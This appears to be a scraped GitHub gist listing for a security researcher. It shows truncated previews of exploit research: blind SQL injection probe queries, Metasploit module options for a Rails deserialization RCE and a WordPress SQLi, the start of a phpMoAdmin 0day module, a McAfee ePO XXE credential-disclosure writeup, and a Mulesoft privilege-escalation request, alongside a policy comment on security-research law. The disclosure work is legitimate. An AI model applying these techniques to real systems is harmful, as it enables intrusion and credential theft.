Skip to content

Instantly share code, notes, and snippets.

☠️
thought bleeding

Brandon Perry brandonprry

☠️
thought bleeding
Block or report user

Report or block brandonprry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View arachni.cs
public static void Main (string[] args)
{
using (ArachniSession session = new ArachniSession ("192.168.2.207", 4567, true)) {
using (ArachniManager manager = new ArachniManager (session)) {
var resp = manager.StartScan ("http://192.168.2.87/?searchquery=fdsa&action=search&x=11&y=15");
while (manager.IsBusy ()) {
Thread.Sleep (10000);
Console.Write (".");
}
View gist:6c88f60bddabf99a11da

Comment regarding Class-25: Software – security research

Brandon Perry, VolatileMinds

Legislation concerning lawful security research requires consideration not only into the current state of software security, but also the future of how we as Americans will consume and create software. Increasingly, software drives basic functions within each and every American’s daily life. Legislators and members of the security community have an excellent opportunity to create a framework that allows research by those with the capabilities and know-how to bolster the security of our homes, our businesses, and our infrastructure.

We live in a digital world now. 30 years ago, when computer software was only beginning to be accepted into the mainstream public, legislators passed the Computer Fraud and Abuse Act. This was before the Internet of Everything was a gleam in anyone’s eye, and the notion of us running out of IP addresses was laughable. Now, we have critical infrastructure, smart home appliances, and even vehicle

View gist:ec85fb9e890a240b1579
mysql> select 1 from users where 'fdsa' rlike (select (case when (19>20) then 'a' else '|' end));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> select length((select name from users limit 0,1));
+--------------------------------------------+
| length((select name from users limit 0,1)) |
+--------------------------------------------+
| 5 |
+--------------------------------------------+
1 row in set (0.00 sec)
@brandonprry
brandonprry / gist:f83917e0fcc3bf3ccd6b
Last active Aug 29, 2015
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
View gist:f83917e0fcc3bf3ccd6b
msf exploit(rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE_NAME no The name of the session cookie
DIGEST_NAME SHA1 yes The digest t
@brandonprry
brandonprry / phpmoadmin_rce.rb
Last active Aug 29, 2015
Quick metasploit module for possible phpMoAdmin 0day
View phpmoadmin_rce.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote
@brandonprry
brandonprry / wtreef
Created Feb 20, 2015
Small BST solver for contest at work. I think I cheated.
View wtreef
// Submitted by: Brandon Perry
// wtreef.cpp : Defines the entry point for the console application.
//
//Quick run:
/*
brandon.perry@BRANPERRY-X64 ~
$ time '/cygdrive/c/Users/brandon.perry/Documents/Visual Studio 2013/Projects/wtreef/Release/wtreef.exe'
Created a valid binary tree, but invalid BST. The tree was fixed and verified for 10 nodes.
Created a valid binary tree, but invalid BST. The tree was fixed and verified for 2010 nodes.
View gist:939bb8e969a57301ffc3
Module options (auxiliary/gather/wp_photogallery_users_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
GALLERYID no Gallery ID to use. If not provided, the module will attempt to bruteforce one.
Proxies no Use a proxy chain
RHOST 172.31.16.30 yes The target address
RPORT 80 yes The target port
TARGETURI /wordpress yes Relative URI of Wordpress installation
VHOST no HTTP server virtual host
View gist:692e553975bf29aeaf2c
=begin
McAfee ePolicy Orchestrator Authenticated XXE and Credential Disclosure
Trial available here:
https://secure.mcafee.com/apps/downloads/free-evaluations/survey.aspx?mktg=ESD1172&cid=ESD1172&eval=A0C692FB-8E29-4D47-BBF1-43CAB5F10069&region=us
McAfee ePolicy Orchestrator suffers from an authenticated XXE vulnerability, available to any authenticated user. The Server Task Log option in the upper left menu is where the vulnerability lies. When creating a custom filter, a bit of XML is passed from the client to the server to create the said filter. This parameter is called 'conditionXML' and is vulnerable to an XXE attack. The attack seems a bit limited however, as you can only fit up to 255 characters in the 'value' field.
However, a file in the web server installation configuration directory called 'keystore.properties' is less than the size we need, and contains an encrypted passphrase that is set during installation. When installing, an initial admin user is created (with 'admin' as the default userna
View gist:396aa6eda74a5aaa19ac
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
You can’t perform that action at this time.